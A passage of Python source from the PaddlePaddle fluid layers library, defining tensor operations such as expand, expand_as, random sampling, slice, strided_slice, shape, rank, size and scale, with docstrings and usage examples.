data_2 = fluid.layers.fill_constant(shape=[12, 14], dtype="int32", value=3)
expand_times = fluid.layers.fill_constant(shape=[2], dtype="int32", value=4)
expanded_2 = fluid.layers.expand(data_2, expand_times=expand_times)
# the shape of expanded_2 is [48, 56].
"""
if in_dygraph_mode():
if isinstance(expand_times, (list, tuple)):
if utils._contain_var(expand_times):
raise TypeError(
"The type of 'expand_times' in expand must be list[int] or tuple(int) in Dygraph mode, but "
"received %s, which contains Variable." % type(shape))
else:
raise TypeError(
"The type of 'expand_times' in expand must be list[int] or tuple(int) in Dygraph mode, but "
"received %s." % type(shape))
return core.ops.expand(x, 'expand_times', expand_times)
inputs = {"X": [x]}
attrs = {}
check_variable_and_dtype(
x, 'x', ['bool', 'float32', 'float64', 'int32', 'int64'], 'expand')
check_type(expand_times, 'expand_times', (list, tuple, Variable), 'expand')
if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == True:
raise ValueError(
"expand op bool date type must set the stop_gradient to be False")
helper = LayerHelper('expand', input=x, **locals())
def get_attr_expand_times(list_expand_times):
attrs_expand_times = []
for idx, times in enumerate(list_expand_times):
if isinstance(times, Variable):
attrs_expand_times.append(-1)
else:
attrs_expand_times.append(times)
assert times > 0, (
"Each element given in expand_times must not be negative.")
return attrs_expand_times
def get_new_expand_times_tensor(list_expand_times):
new_expand_times_tensor = []
for ele in list_expand_times:
if isinstance(ele, Variable):
ele.stop_gradient = True
new_expand_times_tensor.append(ele)
else:
assert (isinstance(ele, int))
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant([1], 'int32', ele, force_cpu=True, out=temp_out)
new_expand_times_tensor.append(temp_out)
return new_expand_times_tensor
if isinstance(expand_times, Variable):
expand_times.stop_gradient = True
inputs['ExpandTimes'] = expand_times
elif isinstance(expand_times, (list, tuple)):
attrs['expand_times'] = get_attr_expand_times(expand_times)
if utils._contain_var(expand_times):
inputs['expand_times_tensor'] = get_new_expand_times_tensor(
expand_times)
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='expand', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
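# Illustrative sketch (not part of the original API): with a plain list of ints,
# ``expand`` behaves like ``numpy.tile`` with one repeat count per dimension, as
# in the [2, 3, 1] -> [2, 6, 2] example above. The helper name is an assumption.
def _expand_numpy_sketch(x, expand_times):
    import numpy as np
    return np.tile(np.asarray(x), expand_times)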
def expand_as(x, target_tensor, name=None):
"""
expand_as operator tiles the input to the shape given by the target tensor. You set the target shape
for every dimension by providing the tensor 'target_tensor'. The rank of X
should be in [1, 6]. Please note that the rank of 'target_tensor' must be the same
as the rank of X. Following is a usage case:
.. code-block:: text
Input(X) is a 3-D tensor with shape [2, 3, 1]:
[
[[1], [2], [3]],
[[4], [5], [6]]
]
target_tensor's shape: [2, 6, 2]
Output(Out) is a 3-D tensor with shape [2, 6, 2]:
[
[[1, 1], [2, 2], [3, 3], [1, 1], [2, 2], [3, 3]],
[[4, 4], [5, 5], [6, 6], [4, 4], [5, 5], [6, 6]]
]
Args:
x (Variable): A Tensor with dtype float64, float32, int32.
A tensor with rank in [1, 6].
target_tensor (Variable): A Tensor with dtype float64, float32, int32.
target_tensor for expanding to Input(X). Only use target_tensor'shape.
Returns:
Variable: A Tensor with dtype float64, float32, int32.
After expanding, the size of each dimension of Output(Out) is equal to the size
of the corresponding dimension of target_tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
data = fluid.layers.data(name="data", shape=[-1,10], dtype='float64')
target_tensor = fluid.layers.data(
name="target_tensor", shape=[-1,20], dtype='float64')
result = fluid.layers.expand_as(x=data, target_tensor=target_tensor)
use_cuda = False
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
x = np.random.rand(3,10)
y = np.random.rand(3,20)
output= exe.run(feed={"data":x,"target_tensor":y},fetch_list=[result.name])
print(output[0].shape)
#(3,20)
"""
helper = LayerHelper('expand_as', input=x, **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
inputs = {'X': x, 'target_tensor': target_tensor}
helper.append_op(type='expand_as', inputs=inputs, outputs={'Out': out})
return out
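# Illustrative sketch (not part of the original API): expand_as only reads the
# shape of the target; the repeat count per dimension is the ratio of the target
# size to the input size (assumed here to divide evenly), then the tiling is the
# same as in ``expand``. Names are assumptions for illustration only.
def _expand_as_numpy_sketch(x, target_shape):
    import numpy as np
    x = np.asarray(x)
    reps = [t // s for t, s in zip(target_shape, x.shape)]
    return np.tile(x, reps)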
from paddle.fluid.framework import convert_np_dtype_to_dtype_
@templatedoc()
def uniform_random_batch_size_like(input,
shape,
dtype='float32',
input_dim_idx=0,
output_dim_idx=0,
min=-1.0,
max=1.0,
seed=0):
"""
This OP initializes a variable with random values sampled from a
uniform distribution in the range [min, max). The input_dim_idx is used to get the input dimension value, which in turn resizes the corresponding output dimension.
.. code-block:: text
*Case 1:
Given:
input =[[0.946741 , 0.1357001 , 0.38086128]] # input.shape=[1,3]
shape=[2,4]
result.shape[output_dim_idx] = input.shape[input_dim_idx],
output_dim_idx = 0,
input_dim_idx = 0,
result.shape[0] = input.shape[0],
then:
result=[[ 0.3443427 , -0.23056602, 0.3477049 , 0.06139076]] # result.shape=[1,4]
*Case 2:
Given:
input =[[0.946741 , 0.1357001 , 0.38086128]] # input.shape=[1,3]
shape=[2,4]
input_dim_idx=1
output_dim_idx=1
result.shape[output_dim_idx] = input.shape[input_dim_idx],
output_dim_idx = 1,
input_dim_idx = 1,
result.shape[1] = input.shape[1],
then:
result=[[-0.23133647, -0.84195036, 0.21441269],
[-0.08774924, 0.25605237, -0.09403259]] # result.shape=[2,3]
Args:
input (Variable): A Tensor. Supported data types: float32, float64.
shape (tuple|list): A python list or python tuple. The shape of the output Tensor, the data type is int.
input_dim_idx (int, optional): An index used to get the input dimension value which will be used to resize the output dimension. Default 0.
output_dim_idx (int, optional): An index used to indicate the specific dimension that will be replaced by corresponding input dimension value. Default 0.
min (float, optional): The lower bound on the range of random values to generate, the min is included in the range. Default -1.0.
max (float, optional): The upper bound on the range of random values to generate, the max is excluded in the range. Default 1.0.
seed (int, optional): Random seed used for generating samples. 0 means use a seed generated by the system.Note that if seed is not 0, this operator will always generate the same random numbers every time.
dtype(np.dtype|core.VarDesc.VarType|str, optional): The data type of output Tensor. Supported data types: float32, float64. Default float32.
Returns:
Variable: A Tensor of the specified shape filled with uniform_random values. The shape of the Tensor is determined by the shape parameter and the specified dimension of the input Tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# example 1:
input = fluid.data(name="input", shape=[1, 3], dtype='float32')
out_1 = fluid.layers.uniform_random_batch_size_like(input, [2, 4]) # out_1.shape=[1, 4]
# example 2:
out_2 = fluid.layers.uniform_random_batch_size_like(input, [2, 4], input_dim_idx=1, output_dim_idx=1) # out_2.shape=[2, 3]
"""
helper = LayerHelper('uniform_random_batch_size_like', **locals())
out = helper.create_variable_for_type_inference(dtype)
c_dtype = convert_np_dtype_to_dtype_(dtype)
helper.append_op(
type='uniform_random_batch_size_like',
inputs={'Input': input},
outputs={'Out': out},
attrs={
'shape': shape,
'input_dim_idx': input_dim_idx,
'output_dim_idx': output_dim_idx,
'min': min,
'max': max,
'seed': seed,
'dtype': c_dtype
})
return out
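# Illustrative sketch (not part of the original API): the only shape arithmetic in
# the *_batch_size_like ops -- one entry of ``shape`` is overwritten by one entry
# of the input's shape, as in Case 1/2 above. The helper name is an assumption.
def _batch_size_like_shape_sketch(input_shape, shape, input_dim_idx=0,
                                  output_dim_idx=0):
    out_shape = list(shape)
    out_shape[output_dim_idx] = input_shape[input_dim_idx]
    return out_shape
# e.g. _batch_size_like_shape_sketch([1, 3], [2, 4]) == [1, 4]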
@templatedoc()
def gaussian_random(shape, mean=0.0, std=1.0, seed=0, dtype='float32'):
"""
Generate a random tensor whose data is drawn from a Gaussian distribution.
Args:
shape (Tuple[int] | List[int]): Shape of the generated random tensor.
mean (float): Mean of the random tensor, defaults to 0.0.
std (float): Standard deviation of the random tensor, defaults to 1.0.
seed (int): ${seed_comment}
dtype(np.dtype | core.VarDesc.VarType | str): Output data type, float32 or float64.
Returns:
Variable: Random tensor whose data is drawn from a Gaussian distribution, dtype: float32 or float64 as specified.
Examples:
.. code-block:: python
# declarative mode
import numpy as np
from paddle import fluid
x = fluid.layers.gaussian_random((2, 3), std=2., seed=10)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
start = fluid.default_startup_program()
main = fluid.default_main_program()
exe.run(start)
x_np, = exe.run(main, feed={}, fetch_list=[x])
x_np
# array([[2.3060477, 2.676496 , 3.9911983],
# [0.9990833, 2.8675377, 2.2279181]], dtype=float32)
.. code-block:: python
# imperative mode
import numpy as np
from paddle import fluid
import paddle.fluid.dygraph as dg
place = fluid.CPUPlace()
with dg.guard(place) as g:
x = fluid.layers.gaussian_random((2, 4), mean=2., dtype="float32", seed=10)
x_np = x.numpy()
x_np
# array([[2.3060477 , 2.676496 , 3.9911983 , 0.9990833 ],
# [2.8675377 , 2.2279181 , 0.79029655, 2.8447366 ]], dtype=float32)
"""
helper = LayerHelper('gaussian_random', **locals())
out = helper.create_variable_for_type_inference(dtype)
c_dtype = convert_np_dtype_to_dtype_(dtype)
helper.append_op(
type='gaussian_random',
outputs={'Out': out},
attrs={
'shape': shape,
'mean': mean,
'std': std,
'seed': seed,
'dtype': c_dtype,
'use_mkldnn': False
})
return out
@templatedoc()
def sampling_id(x, min=0.0, max=1.0, seed=0, dtype='float32'):
"""
This op is used for sampling id from multinomial distribution from the input, sampling one id for one sample.
Parameters:
x (Variable): 2-D tensor, [batch_size, input_feature_dimensions]
min (float): minimum, default 0.0.
max (float): maximum, default 1.0.
seed (int): Random seed, default 0. If seed is not 0, it will generate the same random numbers every time.
dtype(np.dtype|core.VarDesc.VarType|str): The type of output data: float32, float16, int, etc.
Returns:
Variable: sampling tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(
name="X",
shape=[13, 11],
dtype='float32')
out = fluid.layers.sampling_id(x)
"""
helper = LayerHelper('sampling_id', **locals())
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='sampling_id',
inputs={'X': x},
outputs={'Out': out},
attrs={'min': min,
'max': max,
'seed': seed})
return out
@templatedoc()
def gaussian_random_batch_size_like(input,
shape,
input_dim_idx=0,
output_dim_idx=0,
mean=0.0,
std=1.0,
seed=0,
dtype='float32'):
"""
${comment}
Args:
input (Variable): ${input_comment}
shape (tuple|list): ${shape_comment}
input_dim_idx (int): ${input_dim_idx_comment}
output_dim_idx (int): ${output_dim_idx_comment}
mean (float): ${mean_comment}
std (float): ${std_comment}
seed (int): ${seed_comment}
dtype(np.dtype|core.VarDesc.VarType|str): The type of output data, float32 or float64.
Returns:
out (Variable): ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(name="input", shape=[13, 11], dtype='float32')
out = fluid.layers.gaussian_random_batch_size_like(
input, shape=[-1, 11], mean=1.0, std=2.0)
"""
helper = LayerHelper('gaussian_random_batch_size_like', **locals())
out = helper.create_variable_for_type_inference(dtype)
c_dtype = convert_np_dtype_to_dtype_(dtype)
helper.append_op(
type='gaussian_random_batch_size_like',
inputs={'Input': input},
outputs={'Out': out},
attrs={
'shape': shape,
'input_dim_idx': input_dim_idx,
'output_dim_idx': output_dim_idx,
'mean': mean,
'std': std,
'seed': seed,
'dtype': c_dtype
})
return out
@templatedoc()
def sum(x):
"""
${comment}
Case 1:
::
Input:
Input. Shape = [2, 3]
Input = [[1, 2, 3],
[4, 5, 6]]
Output:
The output. Shape = [2, 3]
Output = [[1, 2, 3],
[4, 5, 6]]
Case 2:
::
Input:
First input:
Input1. Shape = [2, 3]
Input1 = [[1, 2, 3],
[4, 5, 6]]
The second input:
Input2. Shape = [2, 3]
Input2 = [[7, 8, 9],
[10, 11, 12]]
Output:
The output. Shape = [2, 3]
Output = [[8, 10, 12],
[14, 16, 18]]
Args:
x (Variable|list(Variable)): ${x_comment}
Returns:
Variable: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
input0 = fluid.layers.fill_constant(shape=[2, 3], dtype='int64', value=5)
input1 = fluid.layers.fill_constant(shape=[2, 3], dtype='int64', value=3)
sum = fluid.layers.sum([input0, input1])
# You can print out 'sum' via executor.
out = fluid.layers.Print(sum, message="the sum of input0 and input1: ")
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_main_program())
# The printed result is:
# 1570701754 the sum of input0 and input1: The place is:CPUPlace
# Tensor[sum_0.tmp_0]
# shape: [2,3,]
# dtype: l
# data: 8,8,8,8,8,8,
# the sum of input0 and input1 is 2-D Tensor with shape [2,3].
# dtype is the corresponding C++ data type, which may vary in different environments.
# Eg: if the data type of tensor is int64, then the corresponding C++ data type is int64_t,
# so the dtype value is typeid(int64_t).Name(), which is 'x' on MacOS, 'l' on Linux,
# and '__int64' on Windows. They both represent 64-bit integer variables.
"""
return paddle.elementwise_sum(x)
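# Illustrative sketch (not part of the original API): ``sum`` over a list of
# equally shaped tensors is an element-wise addition, as in Case 2 above.
def _sum_numpy_sketch(xs):
    import numpy as np
    out = np.asarray(xs[0]).copy()
    for x in xs[1:]:
        out = out + np.asarray(x)
    return out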
@templatedoc()
def slice(input, axes, starts, ends):
"""
This operator produces a slice of ``input`` along multiple axes. Similar to numpy:
https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html
Slice uses ``axes``, ``starts`` and ``ends`` attributes to specify the start and
end dimension for each axis in the list of axes and Slice uses this information
to slice the input data tensor. If a negative value is passed to
``starts`` or ``ends`` such as :math:`-i`, it represents the reverse position of the
axis :math:`i-1` (here 0 is the initial position).
If the value passed to ``starts`` or ``ends`` is greater than n
(the number of elements in this dimension), it represents n.
For slicing to the end of a dimension with unknown size, it is recommended
to pass in INT_MAX. The size of ``axes`` must be equal to that of ``starts`` and ``ends``.
Following examples will explain how slice works:
.. code-block:: text
Case1:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [1, 0]
ends = [2, 3]
Then:
result = [ [5, 6, 7], ]
Case2:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [0, 1]
ends = [-1, 1000] # -1 denotes the reverse 0th position of dimension 0.
Then:
result = [ [2, 3, 4], ] # result = data[0:1, 1:4]
Args:
input (Variable): A ``Tensor`` or ``LoDTensor`` . The data type is ``float16``, ``float32``, ``float64``, ``int32`` or ``int64``.
axes (list|tuple): The data type is ``int32`` . Axes that `starts` and `ends` apply to.
It's optional. If it is not provided, it will be treated as :math:`[0,1,...,len(starts)-1]`.
starts (list|tuple|Variable): The data type is ``int32`` . If ``starts`` is a list or tuple, the elements of
it should be integers or Tensors with shape [1]. If ``starts`` is a Variable, it should be a 1-D Tensor.
It represents starting indices of corresponding axis in ``axes``.
ends (list|tuple|Variable): The data type is ``int32`` . If ``ends`` is a list or tuple, the elements of
it should be integers or Tensors with shape [1]. If ``ends`` is a Variable, it should be a 1-D Tensor.
It represents ending indices of corresponding axis in ``axes``.
Returns:
Variable: A ``Tensor`` or ``LoDTensor``. The data type is same as ``input``.
Raises:
TypeError: The type of ``starts`` must be list, tuple or Variable.
TypeError: The type of ``ends`` must be list, tuple or Variable.
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(
name="input", shape=[4, 5, 6], dtype='float32')
# example 1:
# attr starts is a list which doesn't contain tensor Variable.
axes = [0, 1, 2]
starts = [-3, 0, 2]
ends = [3, 2, 4]
sliced_1 = fluid.layers.slice(input, axes=axes, starts=starts, ends=ends)
# sliced_1 is input[0:3, 0:2, 2:4].
# example 2:
# attr starts is a list which contain tensor Variable.
minus_3 = fluid.layers.fill_constant([1], "int32", -3)
sliced_2 = fluid.layers.slice(input, axes=axes, starts=[minus_3, 0, 2], ends=ends)
# sliced_2 is input[0:3, 0:2, 2:4].
"""
if in_dygraph_mode():
infer_flags = list(1 for i in range(len(axes)))
if isinstance(starts, (list, tuple)):
if utils._contain_var(starts):
raise TypeError(
"The type of 'starts' in slice must be list[int] or tuple(int) in Dygraph mode, but "
"received %s, which contains Variable." % type(shape))
else:
raise TypeError(
"The type of 'starts' in slice must be list[int] or tuple(int) in Dygraph mode, but "
"received %s." % type(shape))
if isinstance(ends, (list, tuple)):
if utils._contain_var(ends):
raise TypeError(
"The type of 'ends' in slice must be list[int] or tuple(int) in Dygraph mode, but "
"received %s, which contains Variable." % type(shape))
else:
raise TypeError(
"The type of 'ends' in slice must be list[int] or tuple(int) in Dygraph mode, but "
"received %s." % type(shape))
return core.ops.slice(input, 'axes', axes, 'starts', starts, 'ends',
ends, 'infer_flags', infer_flags)
if not isinstance(starts, (list, tuple, Variable)):
raise ValueError(
"Input starts must be an Variable, python list or tuple.")
if not isinstance(ends, (list, tuple, Variable)):
raise ValueError(
"Input ends must be an Variable, python list or tuple.")
helper = LayerHelper('slice', **locals())
def get_new_list_tensor(old_list):
new_list_tensor = []
for dim in old_list:
if isinstance(dim, Variable):
dim.stop_gradient = True
new_list_tensor.append(dim)
else:
assert (isinstance(dim, int))
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant([1], 'int32', dim, force_cpu=True, out=temp_out)
new_list_tensor.append(temp_out)
return new_list_tensor
inputs = {'Input': input}
attrs = {'axes': axes}
infer_flags = list(1 for i in range(len(axes)))
# starts
if isinstance(starts, Variable):
starts.stop_gradient = True
inputs['StartsTensor'] = starts
infer_flags = list(-1 for i in range(len(axes)))
elif isinstance(starts, (list, tuple)):
attrs['starts'] = []
if utils._contain_var(starts):
inputs['StartsTensorList'] = get_new_list_tensor(starts)
for i, dim in enumerate(starts):
if isinstance(dim, Variable):
attrs['starts'].append(-1)
infer_flags[i] = -1
else:
attrs['starts'].append(dim)
else:
attrs['starts'] = starts
# ends
if isinstance(ends, Variable):
ends.stop_gradient = True
inputs['EndsTensor'] = ends
infer_flags = list(-1 for i in range(len(axes)))
elif isinstance(ends, (list, tuple)):
attrs['ends'] = []
if utils._contain_var(ends):
inputs['EndsTensorList'] = get_new_list_tensor(ends)
for i, dim in enumerate(ends):
if isinstance(dim, Variable):
attrs['ends'].append(-1)
infer_flags[i] = -1
else:
attrs['ends'].append(dim)
else:
attrs['ends'] = ends
# infer_flags
attrs['infer_flags'] = infer_flags
out = helper.create_variable_for_type_inference(
dtype=helper.input_dtype('input'))
helper.append_op(
type='slice', inputs=inputs, attrs=attrs, outputs={'Out': out})
return out
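# Illustrative sketch (not part of the original API): the axes/starts/ends triple
# used by ``slice`` maps onto ordinary Python slices; negative indices and
# out-of-range ends behave as described above because Python slicing clamps them.
def _slice_numpy_sketch(x, axes, starts, ends):
    import numpy as np
    x = np.asarray(x)
    index = [slice(None)] * x.ndim
    for axis, start, end in zip(axes, starts, ends):
        index[axis] = slice(start, end)
    return x[tuple(index)]
# e.g. Case 2 above: _slice_numpy_sketch(data, [0, 1], [0, 1], [-1, 1000])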
@templatedoc()
def strided_slice(input, axes, starts, ends, strides):
"""
This operator produces a slice of ``input`` along multiple axes. Similar to numpy:
https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html
Slice uses ``axes``, ``starts`` and ``ends`` attributes to specify the start and
end dimension for each axis in the list of axes and Slice uses this information
to slice the input data tensor. If a negative value is passed to
``starts`` or ``ends`` such as :math:`-i`, it represents the reverse position of the
axis :math:`i-1` (here 0 is the initial position). The ``strides`` represents steps of
slicing and if the ``strides`` is negative, slice operation is in the opposite direction.
If the value passed to ``starts`` or ``ends`` is greater than n
(the number of elements in this dimension), it represents n.
For slicing to the end of a dimension with unknown size, it is recommended
to pass in INT_MAX. The size of ``axes`` must be equal to that of ``starts`` , ``ends`` and ``strides``.
Following examples will explain how strided_slice works:
.. code-block:: text
Case1:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [1, 0]
ends = [2, 3]
strides = [1, 1]
Then:
result = [ [5, 6, 7], ]
Case2:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [0, 1]
ends = [2, 0]
strides = [1, -1]
Then:
result = [ [8, 7, 6], ]
Case3:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [0, 1]
ends = [-1, 1000]
strides = [1, 3]
Then:
result = [ [2], ]
Args:
input (Variable): An N-D ``Tensor`` or ``LoDTensor`` . The data type is ``float32``, ``float64``, ``int32`` or ``int64``.
axes (list|tuple): The data type is ``int32`` . Axes that `starts` and `ends` apply to.
            It's optional. If it is not provided, it will be treated as :math:`[0,1,...,len(starts)-1]`.
        starts (list|tuple|Variable): The data type is ``int32`` . If ``starts`` is a list or tuple, the elements of
            it should be integers or Tensors with shape [1]. If ``starts`` is a Variable, it should be a 1-D Tensor.
            It represents starting indices of corresponding axis in ``axes``.
        ends (list|tuple|Variable): The data type is ``int32`` . If ``ends`` is a list or tuple, the elements of
            it should be integers or Tensors with shape [1]. If ``ends`` is a Variable, it should be a 1-D Tensor.
            It represents ending indices of corresponding axis in ``axes``.
        strides (list|tuple|Variable): The data type is ``int32`` . If ``strides`` is a list or tuple, the elements of
            it should be integers or Tensors with shape [1]. If ``strides`` is a Variable, it should be a 1-D Tensor.
            It represents the slice step of corresponding axis in ``axes``.
Returns:
Variable: A ``Tensor`` or ``LoDTensor`` with the same dimension as ``input``. The data type is same as ``input``.
Raises:
TypeError: The type of ``starts`` must be list, tuple or Variable.
TypeError: The type of ``ends`` must be list, tuple or Variable.
TypeError: The type of ``strides`` must be list, tuple or Variable.
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(
name="input", shape=[3, 4, 5, 6], dtype='float32')
# example 1:
# attr starts is a list which doesn't contain tensor Variable.
axes = [0, 1, 2]
starts = [-3, 0, 2]
ends = [3, 2, 4]
strides_1 = [1, 1, 1]
strides_2 = [1, 1, 2]
sliced_1 = fluid.layers.strided_slice(input, axes=axes, starts=starts, ends=ends, strides=strides_1)
# sliced_1 is input[:, 0:3:1, 0:2:1, 2:4:1].
# example 2:
# attr starts is a list which contain tensor Variable.
minus_3 = fluid.layers.fill_constant([1], "int32", -3)
sliced_2 = fluid.layers.strided_slice(input, axes=axes, starts=[minus_3, 0, 2], ends=ends, strides=strides_2)
# sliced_2 is input[:, 0:3:1, 0:2:1, 2:4:2].
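
        A further runnable sketch (static graph, positive strides only; the
        expected values follow from ordinary Python slicing, which the
        comments in example 1 above already rely on):

        .. code-block:: python

            import paddle.fluid as fluid
            import numpy as np

            x = fluid.data(name="x", shape=[2, 3], dtype="float32")
            out = fluid.layers.strided_slice(
                x, axes=[1], starts=[0], ends=[3], strides=[2])
            exe = fluid.Executor(fluid.CPUPlace())
            exe.run(fluid.default_startup_program())
            x_np = np.arange(6).reshape(2, 3).astype("float32")
            res, = exe.run(feed={"x": x_np}, fetch_list=[out])
            print(res)  # x_np[:, 0:3:2] -> [[0., 2.], [3., 5.]]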
"""
    if not isinstance(starts, (list, tuple, Variable)):
        raise ValueError(
            "Input starts must be a Variable, Python list or tuple.")
    if not isinstance(ends, (list, tuple, Variable)):
        raise ValueError(
            "Input ends must be a Variable, Python list or tuple.")
    if not isinstance(strides, (list, tuple, Variable)):
        raise ValueError(
            "Input strides must be a Variable, Python list or tuple.")
helper = LayerHelper('strided_slice', **locals())
def get_new_list_tensor(old_list):
new_list_tensor = []
for dim in old_list:
if isinstance(dim, Variable):
dim.stop_gradient = True
new_list_tensor.append(dim)
else:
assert (isinstance(dim, int))
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant([1], 'int32', dim, force_cpu=True, out=temp_out)
new_list_tensor.append(temp_out)
return new_list_tensor
inputs = {'Input': input}
attrs = {'axes': axes}
infer_flags = list(1 for i in range(len(axes)))
if in_dygraph_mode():
inputs = {'Input': input}
attrs = {
'axes': axes,
'starts': starts,
'ends': ends,
'strides': strides,
'infer_flags': infer_flags
}
else:
# starts
if isinstance(starts, Variable):
starts.stop_gradient = True
inputs['StartsTensor'] = starts
elif isinstance(starts, (list, tuple)):
attrs['starts'] = []
if utils._contain_var(starts):
inputs['StartsTensorList'] = get_new_list_tensor(starts)
for i, dim in enumerate(starts):
if isinstance(dim, Variable):
attrs['starts'].append(-1)
infer_flags[i] = -1
else:
attrs['starts'].append(dim)
else:
attrs['starts'] = starts
# ends
if isinstance(ends, Variable):
ends.stop_gradient = True
inputs['EndsTensor'] = ends
elif isinstance(ends, (list, tuple)):
attrs['ends'] = []
if utils._contain_var(ends):
inputs['EndsTensorList'] = get_new_list_tensor(ends)
for i, dim in enumerate(ends):
if isinstance(dim, Variable):
attrs['ends'].append(-1)
infer_flags[i] = -1
else:
attrs['ends'].append(dim)
else:
attrs['ends'] = ends
# strides
if isinstance(strides, Variable):
strides.stop_gradient = True
inputs['StridesTensor'] = strides
elif isinstance(strides, (list, tuple)):
attrs['strides'] = []
if utils._contain_var(strides):
inputs['StridesTensorList'] = get_new_list_tensor(strides)
for i, dim in enumerate(strides):
if isinstance(dim, Variable):
attrs['strides'].append(-1)
infer_flags[i] = -1
else:
attrs['strides'].append(dim)
else:
attrs['strides'] = strides
attrs['infer_flags'] = infer_flags
out = helper.create_variable_for_type_inference(
dtype=helper.input_dtype('input'))
helper.append_op(
type='strided_slice', inputs=inputs, attrs=attrs, outputs={'Out': out})
return out
def shape(input):
"""
**Shape Layer**
Get the shape of the input.
Args:
input (Variable): The input N-D Tensor. Datatype can be float32, float64, int32, int64.
Returns:
Variable (Tensor): The shape of the input variable.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
inputs = fluid.layers.data(name="x", shape=[3, 100, 100], dtype="float32")
output = fluid.layers.shape(inputs)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
img = np.ones((3, 100, 100)).astype(np.float32)
res = exe.run(fluid.default_main_program(), feed={'x':img}, fetch_list=[output])
print(res) # [array([ 3, 100, 100], dtype=int32)]
"""
helper = LayerHelper('shape', **locals())
out = helper.create_variable_for_type_inference(dtype='int32')
helper.append_op(
type='shape', inputs={'Input': input}, outputs={'Out': out})
return out
def rank(input):
"""
The OP returns the number of dimensions for a tensor, which is a 0-D int32 Tensor.
Args:
input (Variable): The input N-D tensor with shape of :math:`[N_1, N_2, ..., N_k]`, the data type is arbitrary.
Returns:
        Variable: The 0-D tensor with the dimensions (rank) of the input variable. The output data type is int32.
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(name="input", shape=[3, 100, 100], dtype="float32")
rank = fluid.layers.rank(input) # rank=(3,)
"""
ndims = len(input.shape)
out = assign(np.array(ndims, 'int32'))
return out
def size(input):
"""
**Size Layer**
Returns the number of elements for a tensor, which is a int64 Tensor with shape [1].
Args:
input (Variable): The input variable.
Returns:
Variable: The number of elements for the input variable.
Examples:
.. code-block:: python
import paddle.fluid.layers as layers
input = layers.data(
name="input", shape=[3, 100], dtype="float32", append_batch_size=False)
rank = layers.size(input) # 300
"""
helper = LayerHelper('size', **locals())
out = helper.create_variable_for_type_inference(dtype='int64')
helper.append_op(type='size', inputs={'Input': input}, outputs={'Out': out})
return out
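# Shared static-graph builder for the public elementwise_* wrappers below: it
# reads x, y, axis, act and use_mkldnn from the calling LayerHelper's kwargs,
# validates the dtypes, appends a single elementwise op and finally applies
# the optional activation.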
def _elementwise_op(helper):
op_type = helper.layer_type
x = helper.kwargs.get('x', None)
y = helper.kwargs.get('y', None)
assert x is not None, 'x cannot be None in {}'.format(op_type)
assert y is not None, 'y cannot be None in {}'.format(op_type)
check_variable_and_dtype(
x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64'], op_type)
check_variable_and_dtype(
y, 'y', ['float16', 'float32', 'float64', 'int32', 'int64'], op_type)
axis = helper.kwargs.get('axis', -1)
use_mkldnn = helper.kwargs.get('use_mkldnn', False)
name = helper.kwargs.get('name', None)
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type=op_type,
inputs={'X': x,
'Y': y},
outputs={'Out': out},
attrs={'axis': axis,
'use_mkldnn': use_mkldnn})
return helper.append_activation(out)
def scale(x, scale=1.0, bias=0.0, bias_after_scale=True, act=None, name=None):
"""
Scale operator.
Putting scale and bias to the input Tensor as following:
``bias_after_scale`` is True:
.. math::
Out=scale*X+bias
``bias_after_scale`` is False:
.. math::
Out=scale*(X+bias)
Args:
x(Variable): Input N-D Tensor of scale operator. Data type can be float32, float64, int8, int16, int32, int64, uint8.
scale(float|Variable): The scale factor of the input, it should be a float number or a Variable with shape [1] and data type as float32.
bias(float): The bias to be put on the input.
bias_after_scale(bool): Apply bias addition after or before scaling. It is useful for numeric stability in some circumstances.
act(str, optional): Activation applied to the output such as tanh, softmax, sigmoid, relu.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable(Tensor|LoDTensor): Output tensor of scale operator, with shape and data type same as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
inputs = fluid.layers.data(name="x", shape=[2, 3], dtype='float32')
output = fluid.layers.scale(inputs, scale = 2.0, bias = 1.0)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
img = np.array([[1, 2, 3], [4, 5, 6]]).astype(np.float32)
res = exe.run(fluid.default_main_program(), feed={'x':img}, fetch_list=[output])
print(res) # [array([[ 3., 5., 7.], [ 9., 11., 13.]], dtype=float32)]
.. code-block:: python
# scale with parameter scale as Variable
import paddle.fluid as fluid
import numpy as np
inputs = fluid.layers.data(name="x", shape=[2, 3], dtype='float32')
